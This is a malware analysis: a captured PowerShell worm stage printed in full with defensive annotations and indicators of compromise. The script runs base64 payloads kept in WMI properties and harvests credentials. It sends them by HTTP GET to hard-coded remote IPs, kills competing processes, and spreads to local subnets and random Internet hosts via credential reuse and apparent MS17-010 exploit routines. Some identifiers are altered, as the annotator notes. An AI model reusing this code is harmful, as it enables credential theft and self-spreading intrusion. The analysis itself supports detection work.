# ANALYST ANNOTATION (defensive review of a captured script; code tokens are left as found).
#
# Purpose, as far as this listing shows: a PowerShell stage that keeps its payloads
# in properties of a WMI class, harvests credentials and sends them to a hard-coded
# server, then scans and attacks hosts on local subnets and, finally, random
# Internet addresses.
#
# Indicators visible in this listing (useful for hunting and scoping):
#   - WMI class 'root\default:Win32_Services' with properties funs, mon, mimi, sc,
#     ipsu, i17. The stock service class is Win32_Service in root\cimv2, so a class
#     of this name in root\default deserves inspection.
#   - Remote hosts 195.22.127.157 and 93.174.93.73, port 8000, path /api.php?data=
#   - Named mutex "MMLOLSacnner"
#   - Ports referenced in netstat checks: 80, 14444, 3333, 5555, 7777
#   - Files msvcp120.dll / msvcr120.dll written under %SystemRoot%\system32
#
# Not defined in this listing: sentfile, Get-creds, test-ip, Get-NetworksRange,
# eb7, eb8, $RemoteScriptBlock, [PingCastle.Scanners.m17sc]. Presumably they come
# from the base64 blob in the 'funs' property that is decoded and executed below;
# confirm by decoding that property from an affected host.
#
# NOTE(review): several identifiers ('[wmclass]', 'Get-wmiobjects',
# 'Remove-wmiobjects', 'Win32_NetworksAdapterConfiguration') are not standard
# PowerShell/WMI names as written. The text looks altered in transcription; it is
# reproduced unchanged here.

# Start timestamp in milliseconds; used later to cap scanning at 5400 s (90 min).
$stime=[Environment]::TickCount

# Read the 'funs' property, base64-decode it to ASCII text and execute it with iex.
# Everything run from here on may be defined by that blob, which never touches disk
# as a script file.
$funs = ([wmclass] 'root\default:Win32_Services').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun

# Deletes every WMI filter-to-consumer binding in root\subscription whose filter
# does not match 'DSM Event'. Presumably 'DSM Event' is this threat's own
# persistence filter and the rest are removed as competitors -- TODO confirm.
# Defender note: unexpected binding changes in root\subscription are worth alerting on.
Get-wmiobjects __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'DSM Event'} |Remove-wmiobjects

# Choose a drop directory: %SystemRoot%\system32, falling back to %SystemRoot%.
$dirpath=$env:SystemRoot+'\system32'
if (!(test-path $dirpath )){
    $dirpath=$env:SystemRoot
}
# Writes the two runtime DLLs if they are absent, via the undefined helper
# 'sentfile' with keys 'vcp' / 'vcr' (source of the bytes is not visible here).
if (!(test-path ($dirpath+'\msvcp120.dll'))) {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
if (!(test-path ($dirpath+'\msvcr120.dll'))) {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}

# PIDs of all powershell processes, highest CPU first.
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
# Sets $exist when the busiest powershell process (PID in the last netstat column)
# owns an ESTABLISHED connection whose line contains ":80 " or ":14444".
# Presumably an "already running" check for the 'mon' payload -- TODO confirm.
if ($psids -ne $null ) {
    foreach ($t in $tcpconn) {
        $line =$t.split(' ')| ?{$_}
        if ($line -eq $null) {continue}
        if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) ) {
            $exist=$true
            break
        }
    }
}

# Force-kills any process holding an ESTABLISHED connection whose foreign address
# (third column from the end of a netstat line) contains :3333, :5555 or :7777.
# Presumably aimed at competing software using those ports -- TODO confirm.
# Defender note: legitimate processes talking to those ports are terminated too.
foreach ($t in $tcpconn) {
    $line =$t.split(' ')| ?{$_}
    if (!($line -is [array])){continue}
    if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED")) {
        $evid=$line[-1]
        Get-Process -id $evid | stop-process -force
    }
}

# If no such connection was found and at most 8 powershell processes exist, start a
# hidden, non-interactive powershell through the WScript.Shell COM object (window
# style 0). The child re-reads 'mon' and 'funs' from WMI and invokes
# $RemoteScriptBlock with $mon passed twice plus 'Void', 0, '', ''.
# NOTE(review): that argument shape resembles a reflective PE loader -- confirm
# against the decoded 'funs' blob.
# Defender note: 'powershell -NoP -NonI -W Hidden' with an inline command that reads
# WMI class properties is a strong process-creation detection candidate.
if (!$exist -and ($psids.count -le 8)) {
    $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([wmclass] 'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([wmclass] 'root\default:Win32_Services').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
    $vbs = New-Object -ComObject WScript.Shell
    $vbs.run($cmdmon,0)
}

# Credential collection: the undefined helper Get-creds receives the 'mimi' property
# twice and returns two values, stored in $a and $NTLM. $a is later sent to the
# remote server and passed to test-ip as -creds.
# NOTE(review): the property name suggests a credential-dumping payload -- confirm.
$NTLM=$False
$mimi = ([wmclass] 'root\default:Win32_Services').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi

# IP-enabled network adapters; -EA Stop makes a failed query terminate the script.
$Networkss = Get-wmiobjects Win32_NetworksAdapterConfiguration -EA Stop | ? {$_.IPEnabled}

# State kept between runs in WMI: 'ipsu' and 'i17' are space-separated host lists
# (see the concatenations below); 'sc' is a base64 blob decoded to raw bytes and
# handed to eb7/eb8.
$ipsu = ([wmclass] 'root\default:Win32_Services').Properties['ipsu'].Value
$i17 = ([wmclass] 'root\default:Win32_Services').Properties['i17'].Value
$scba= ([wmclass] 'root\default:Win32_Services').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)

# Hard-coded remote servers. The first one that answers ping is used; if none
# answers, the first entry stays selected. Port 8000 is appended.
$se=@('195.22.127.157', '93.174.93.73')
$nic='195.22.127.157'
foreach($t in $se) {
    $pin=test-connection $t
    if ($pin -ne $null) {
        $nic=$t
        break
    }
}
$nic=$nic+":8000"

# Exfiltration: each collected item is UTF-8/base64 encoded and sent as the 'data'
# query parameter of an unencrypted HTTP GET to /api.php.
# Defender note: proxy or flow logs showing GET /api.php?data=<base64> to port 8000
# mean credentials on that host should be treated as compromised.
if ($a.count -ne 0) {
    foreach($aa in $a){
        $data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa))
        (New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data)
    }
}

# Lateral movement over every IP-enabled adapter.
foreach ($Networks in $Networkss) {
    $IPAddress = $Networks.IpAddress[0]
    # Skip adapters with a 169.254 (link-local) address.
    if ($IPAddress -match '^169.254') { continue }
    $SubnetMask = $Networks.IPSubnet[0]
    # Candidate list from the adapter's address and mask (helper not shown).
    $ips=Get-NetworksRange $IPAddress $SubnetMask
    # Add the remote end of every ESTABLISHED TCP connection that is not loopback
    # and not already listed, so peers outside the local subnet are targeted too.
    $tcpconn = netstat -anop tcp
    foreach ($t in $tcpconn) {
        $line =$t.split(' ')| ?{$_}
        if (!($line -is [array])){ continue }
        if ($line.count -le 4){ continue }
        $i=$line[-3].split(':')[0]
        if (($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i)) {
            $ips+=$i
        }
    }
    # Time budget: stop once more than 5400 s have passed since $stime.
    if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
    foreach ($ip in $ips) {
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        if ($ip -eq $IPAddress){continue}
        # Only hosts that answer one ping and pass the 'ipsu' check are processed.
        if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip) {
            $re=0
            # First attempt: the collected credentials via test-ip (helper not shown);
            # a return value of 1 is treated as success.
            if ($a.count -ne 0) {
                $re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM
            }
            if ($re -eq 1) {
                $ipsu = $ipsu + " " + $ip
            } else {
                # Fallback: scanner class m17sc, then eb7 and, if that does not return
                # $true, eb8, both given the 'sc' bytes.
                # NOTE(review): names suggest an MS17-010 check and SMB exploit
                # routines -- confirm against the decoded 'funs' blob.
                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                if ($vul -and $i17 -notcontains $ip) {
                    $res = eb7 $ip $sc
                    if ($res -ne $true) {
                        eb8 $ip $sc
                    }
                    $i17 = $i17 + " " + $ip
                }
            }
        }
    }
}

# Write both host lists back to the WMI class so they survive across runs.
# Defender note: these two properties are a record of hosts this machine has
# reached; collect them during incident response to scope the spread.
$StaticClass=New-Object Management.ManagementClass('root\default:Win32_Services')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()

# Internet phase, entered only if 9.9.9.9 answers ping.
$t=test-connection 9.9.9.9 -Verbose -Count 2
if($t){
    # Single-instance guard: the named mutex "MMLOLSacnner" is created with initial
    # ownership requested; if it already existed ($result is false) the script exits.
    [System.Threading.Mutex]$thread_mutex;
    [bool]$result = $false;
    $thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result);
    if(!$result){
        exit;
    }
    # Endless loop: a random integer from Get-Random is parsed as an IPv4 address,
    # scanned, and attacked with eb7/eb8 on a positive result; 5 s pause per pass.
    # Defender note: sustained outbound connection attempts from powershell.exe to
    # unrelated public addresses are a network-level symptom of this phase.
    while($true){
        $ip=[IPAddress]::Parse([String] (Get-Random)).IPAddressToString
        $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
        if ($vul) {
            $res = eb7 $ip $sc
            if ($res -ne $true) {
                eb8 $ip $sc
            }
        }
        Start-Sleep 5
    }
}